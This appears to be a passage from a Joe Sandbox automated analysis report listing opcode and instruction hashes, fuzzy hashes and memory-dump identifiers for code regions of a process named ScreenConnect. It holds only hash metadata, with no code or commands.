                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bbde006314dc1692b2b6f00904a97a25bbc366563d34730f7c7d1e9d09f93ec
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C041386290EBD98FF7A6976848296757FB0AF53215B0940FBD08DC71E3C919A80DC392
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0a6c419d6b2467d52b7ce2f6aeca116015e4d01e9564ad11967fd1358c6bec6b
                                                                                                                                                                                                                                                                    • Instruction ID: 67cb75c5315cd76783b31e21256d8d04466c30b0cc2caea224f917be756e15df
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a6c419d6b2467d52b7ce2f6aeca116015e4d01e9564ad11967fd1358c6bec6b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B314E70609A4E8FDB88EF28C451AB977B1FF59314B5045A9D01DC72D2CB35EC56CB80
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e2eae6f27536d7b3b0bdcabf457734dd307b9bf2e0770ea81250c9d5145f04bd
                                                                                                                                                                                                                                                                    • Instruction ID: 77130caf2d1e8b9459849a5f16d595e5f44672a1511d38d8d928eea426bb4e5b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2eae6f27536d7b3b0bdcabf457734dd307b9bf2e0770ea81250c9d5145f04bd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1221363184EB898FE7569734CC154A57BF1FF96350B0442BED04DC3192CB28E80AC381
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c7e93cf07ae8554cd52bc5e9f25575d071ed0effbd69de4387151797e7474d4d
                                                                                                                                                                                                                                                                    • Instruction ID: 12746c63b0c134753c3993c112b8b95931faacd4d2ea0427b09d2f5b3110587e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7e93cf07ae8554cd52bc5e9f25575d071ed0effbd69de4387151797e7474d4d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60310A70A0991E8FDF88EF18C451ABA77A2FFA9314B504669D41DC7286CB35EC56CBC0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: db8a7dec62a9c558ed82a57ef533e2745cc18bf8cae9c8d1ae50448449707c4b
                                                                                                                                                                                                                                                                    • Instruction ID: 8665e96fc18a6281bf2df3a6d949960d40fce44ca869309954648693c26178ad
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8a7dec62a9c558ed82a57ef533e2745cc18bf8cae9c8d1ae50448449707c4b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B321DE6690EBBB8FFB69932844652B46AF0DF52240F1984BAC05DCB0D2CC6CD8499781
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 08b2d9810a852042d2306748e3e3cdb73b2c6682da25228f4ddcb1c24b62e741
                                                                                                                                                                                                                                                                    • Instruction ID: 46ef970d5990fa796809ce50639b57f9fe35ae93de2d1fa051823794681ca8bd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08b2d9810a852042d2306748e3e3cdb73b2c6682da25228f4ddcb1c24b62e741
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16113351A2DF9E8FFB89A72C58855B467E0FB9A21071482F6D40DC329BDD18DC4B8381
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 6a49997d1c1866d5cf09cba1b68f90d71f7a52581823e2f48e442c737a086a2e
                                                                                                                                                                                                                                                                    • Instruction ID: b8f019be1aaed1f874376b4c30bdfb2216942961966b2a0302b7a02b6a41259e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a49997d1c1866d5cf09cba1b68f90d71f7a52581823e2f48e442c737a086a2e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B11D5B1E1DB8DCFEFD58B6448550A87FB0EF56304F094199D14DC35A6DB64E4048B81
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 5037346b64a3d35dd09078dad6431b4e9e7fa43293a5b2ec18e2a062b7d34eb6
                                                                                                                                                                                                                                                                    • Instruction ID: bc25ec6bc91aac8629357fc1189c7c4090fe30a21097c41b45ba9514377657bd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5037346b64a3d35dd09078dad6431b4e9e7fa43293a5b2ec18e2a062b7d34eb6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7911E511A0E9794FEB95A37C68599B56BE0DF57310B0840F6E40DCB197DD09E84987C0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a8e2cf001ee7376d7fc23cb29f1a13b8eb2a3630eddf9bc98be1e95603850f50
                                                                                                                                                                                                                                                                    • Instruction ID: a70ff830bc338683c745254cad155e0bb906b5a9a21e5ce26f29f69f651539e3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8e2cf001ee7376d7fc23cb29f1a13b8eb2a3630eddf9bc98be1e95603850f50
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2211C43550DA9C8FDB55EB6CD451DE17FB0FF5632070446EAD04DCB062EA24D948C782
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 524d1fbebf94862aa172b8ea22e616f197d21350b56e85a36ba3ccdce803ec5e
                                                                                                                                                                                                                                                                    • Instruction ID: aeb5ceabe2b1790e039e47efec1af2d62fe6bfe04edb034cfc7e993e1eb85116
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 524d1fbebf94862aa172b8ea22e616f197d21350b56e85a36ba3ccdce803ec5e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 681186A0A19A59CFEB84EF28C445B6577E1FF55300F1481B8C45ECB687DE25EC498BC0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 07d947c82f40644c760144add03ba881c8b8cdfc238ce8c71e28b647cb11f3cb
                                                                                                                                                                                                                                                                    • Instruction ID: c57a23e215dd7140859d4983cec0bcd4042598452123fc27a76b20b59a6d93ed
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07d947c82f40644c760144add03ba881c8b8cdfc238ce8c71e28b647cb11f3cb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C41182A0A19A59CFEB88EF28C445B6577E1FF59300B0481A8C45ECB687DE25EC098BC0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8cdf1cfd923d87ab9250d245dbf967b3a2aafe0836efe654578d5047988511f7
                                                                                                                                                                                                                                                                    • Instruction ID: 8118479b838c99f997c45c3afcaa52737cdd94059afe52718b4807e7a2439260
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cdf1cfd923d87ab9250d245dbf967b3a2aafe0836efe654578d5047988511f7
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5401D2A250F7D58FE756973C54694B03FA0DF8326471881EFD088CB4A7E504991EC392
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c8ccdb8a780cbc804ed5e95e10d74da16fba947b2ff49fe27b641e20c2897d26
                                                                                                                                                                                                                                                                    • Instruction ID: 7c47ebaea46744b35672c02c563b3eff0ed6136d729bbc336ad79a4537c5e524
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8ccdb8a780cbc804ed5e95e10d74da16fba947b2ff49fe27b641e20c2897d26
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5012C2560E7889FEFDADB28D8A15E03BA1EF5631432508EED059CF1C7DA16E84BC741
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: ab2807b801254848d4de8088d3746f3532df925736851dea7fea84b98ed2508f
                                                                                                                                                                                                                                                                    • Instruction ID: de28c2c89725cbb427b3ba2b798a708baaa81f2586c468c6300087a25084c08c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab2807b801254848d4de8088d3746f3532df925736851dea7fea84b98ed2508f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0E08622A09D3D8FABA9A75C54549757BE0EB687007194195E40DC71A5DD14DC888BC0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 20e778d099978ea43daf0335942888fa0f01c8aee3a9d66771569d3d01802f56
                                                                                                                                                                                                                                                                    • Instruction ID: d82206147fdca3e9eca7b726ae2b9ed279c87ac0dbf59caf8bfbdbfa16387373
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20e778d099978ea43daf0335942888fa0f01c8aee3a9d66771569d3d01802f56
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10D05B31E09C3D8F6BA9F71C6448D7572D0EB697107054195E41DC72A8DD14DD8587C4
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 49df250878f1205cf3643e7b607d9ea44cb2bdfaf51e23dd99cae3678d29337d
                                                                                                                                                                                                                                                                    • Instruction ID: 986ea14b410101be2984981af43a1f59248c267fe3cea47e5bbe78ad36fe34cd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49df250878f1205cf3643e7b607d9ea44cb2bdfaf51e23dd99cae3678d29337d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE0861594E63B83FB6C533574953B550A4CF06300F0584BA982E810C5CD5CDC9995D1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f937f5da9919081eb83157cd8e70bd6465bc3c31c938de5f9141d695462a9209
                                                                                                                                                                                                                                                                    • Instruction ID: 57aa640b4fc2b3d274311d6d08dd44e733dfd09c0af9a29748b6f5ee0fe388ac
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f937f5da9919081eb83157cd8e70bd6465bc3c31c938de5f9141d695462a9209
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54D0A701F29D2D4772E4936C24866B802C2F7C965078450B5D40CC334EDC0CDCDB03C1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 87eb376c378d5cf9672845d34ae2718be9e7a19b1351959b29dd63c9920eb7f0
                                                                                                                                                                                                                                                                    • Instruction ID: f34ae14b76ccf3b941b179ae1d5357affc46948aac0cd1fb115cf4ece42ebf43
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87eb376c378d5cf9672845d34ae2718be9e7a19b1351959b29dd63c9920eb7f0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78C09B14E1A55AD7F544FB2844451FD51526F89204B50C435D02D8118ACD3CE91555C9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b0ea1963671ca4ac3f809f1dfa5683d62bdff29b42d71c2f90d43d4650ade340
                                                                                                                                                                                                                                                                    • Instruction ID: bb1cd8da24c49a79ba648a984c9eea9bbce7d102080d33df88854c83eba20701
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0ea1963671ca4ac3f809f1dfa5683d62bdff29b42d71c2f90d43d4650ade340
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32A00244E0F92AD7F061B71810051BD80514F56604B20C135D07D8169ACD2CED5A15DA